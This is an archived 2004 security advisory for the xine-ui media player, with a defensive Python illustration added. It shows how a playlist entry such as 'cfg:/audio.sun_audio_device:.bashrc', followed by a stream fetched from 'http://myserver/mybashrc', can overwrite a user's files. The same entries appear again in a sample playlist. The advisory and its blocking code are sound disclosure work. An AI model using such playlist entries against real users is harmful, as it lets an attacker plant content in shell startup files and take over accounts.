Message-ID: <200404151446.27357.mroi@users.sourceforge.net>
Date: Thu, 15 Apr 2004 14:46:17 +0200
From: Michael Roitzsch <mroi@...rs.sourceforge.net>
To: bugtraq@...urityfocus.com
Cc: xine-announce@...ts.sourceforge.net
Subject: xine security announcement XSA-2004-2
xine security announcement
==========================
Announcement-ID: XSA-2004-2
Summary:
By opening a malicious playlist in the xine-ui media player, an attacker can
write arbitrary content to an arbitrary file, only restricted by the
permissions of the user running xine-ui.
Description:
xine-ui offers the feature of embedding special items in playlists that will
apply changes to xine configuration options once the playlist item is played.
But some of xine's configuration options specify files that will be written
to during playback. One example of such an option is
"audio.sun_audio_device", which specifies the audio device on SUN machines.
The decoded PCM samples of the audio stream will be written to this file. By
having a user open a playlist with an entry
"cfg:/audio.sun_audio_device:.bashrc" followed by an entry
"http://myserver/mybashrc" in xine-ui, the value of the
"audio.sun_audio_device" option will be changed and the next entry will play
a specially crafted audio stream. This way an attacker could fill any file
the user has access to with arbitrary content. Other configuration options
that allow such an attack exist (we also found "dxr3.devicename"), so the
vulnerability is not limited to SUN machines.
Severity:
Exploits have not been seen in public, and not all xine setups use the
vulnerable configuration options. But at least xine users on SUN machines and
users of a DXR3 or Hollywood+ MPEG decoder card are vulnerable. Other such
problematic configuration options might have slipped through the review or
might be provided by xine plugins outside the main xine distribution, leaving
other users vulnerable as well. Given the wide range of possible harm, we
consider this problem to be highly critical.
Affected versions:
All releases starting with 0.9.21 up to and including 0.9.23.
Unaffected versions:
All releases older than 0.9.21.
CVS HEAD has been fixed.
The upcoming 0.99.1 release.
Solution:
Changes to xine configuration options via playlist are now disabled by
default.
The attached patch to xine-ui fixes the problem but should only be used by
distributors who do not want to upgrade. Otherwise, we strongly advise
everyone to upgrade to CVS HEAD or to the next version of xine-ui, which is
to be released soon.
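The following is an added illustration, not code from xine-ui or the xine team, of the behaviour the Description and Solution sections describe: a playlist loader that recognises "cfg:/<option>:<value>" entries (the entry syntax quoted above) as configuration directives and, by default, refuses to apply them, plus an audit helper that flags directives pointing a file-valued option at a path. The option names in FILE_VALUED_OPTIONS are the two the advisory names; the parser itself, the SAFE_OPTIONS allow-list and the path heuristic are assumptions made for this example and do not reflect xine-ui's real option table.

```python
import re
from dataclasses import dataclass, field

# Assumed syntax, taken from the entries quoted in the advisory; xine-ui's
# actual playlist parser is not reproduced here.
CFG_RE = re.compile(r"^cfg:/(?P<option>[A-Za-z0-9_.]+):(?P<value>.*)$")

# Options the advisory names as taking a file/device path that xine writes to.
FILE_VALUED_OPTIONS = frozenset({"audio.sun_audio_device", "dxr3.devicename"})

# Hypothetical allow-list of options that may be changed from a playlist when
# the feature is explicitly switched on: none of them name a file.
SAFE_OPTIONS = frozenset({"audio.volume", "video.deinterlace"})


@dataclass
class LoadResult:
    entries: list = field(default_factory=list)   # URLs/paths queued for playback
    applied: dict = field(default_factory=dict)   # config changes that were accepted
    blocked: list = field(default_factory=list)   # (option, value, reason) tuples


def load_playlist(lines, allow_config=False):
    """Queue media entries and treat cfg: items as configuration directives.

    With allow_config=False (the default, mirroring the advisory's fix) every
    directive is refused and recorded. With allow_config=True only options on
    the allow-list are applied; file-valued options are still refused.
    """
    result = LoadResult()
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = CFG_RE.match(line)
        if m is None:
            result.entries.append(line)
            continue
        option, value = m.group("option"), m.group("value")
        if not allow_config:
            result.blocked.append((option, value, "config changes via playlist are disabled"))
        elif option not in SAFE_OPTIONS:
            result.blocked.append((option, value, "option is not on the allow-list"))
        else:
            result.applied[option] = value
    return result


def looks_like_path(value):
    """Heuristic: the value names a file or device rather than a number or keyword."""
    return value.startswith((".", "/", "~")) or "/" in value


def audit_playlist(lines):
    """Report cfg: directives that aim a file-valued option at a path.

    Useful for scanning playlists before they are opened. It flags the option
    names the advisory lists and any directive whose value looks like a path,
    so options the advisory did not enumerate are still surfaced for review.
    """
    findings = []
    for raw in lines:
        m = CFG_RE.match(raw.strip())
        if m is None:
            continue
        option, value = m.group("option"), m.group("value")
        if option in FILE_VALUED_OPTIONS or looks_like_path(value):
            findings.append((option, value))
    return findings


# Constructed sample modelled on the two entries quoted in the advisory.
SAMPLE_PLAYLIST = [
    "# playlist fetched from an untrusted site",
    "cfg:/audio.sun_audio_device:.bashrc",
    "http://myserver/mybashrc",
    "cfg:/audio.volume:50",
    "http://example.invalid/song.mp3",
]

if __name__ == "__main__":
    res = load_playlist(SAMPLE_PLAYLIST)
    print("queued:", res.entries)
    print("blocked:", res.blocked)
    print("audit findings:", audit_playlist(SAMPLE_PLAYLIST))
```

Run as-is, the loader queues only the two media URLs and records both cfg: directives as blocked, which is the default behaviour the Solution section describes. Opting in with allow_config=True applies the harmless volume change but still refuses the directive that would redirect the audio device to .bashrc, because the only safe policy for an option that names an output file is to never let a playlist set it.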
For further information and in case of questions, please contact the xine
team. Our website is http://xinehq.de/
Michael Roitzsch
Attachment: "xine-ui-implicit-config.patch" (text/x-diff, 1821 bytes); PGP signature omitted from this archive copy.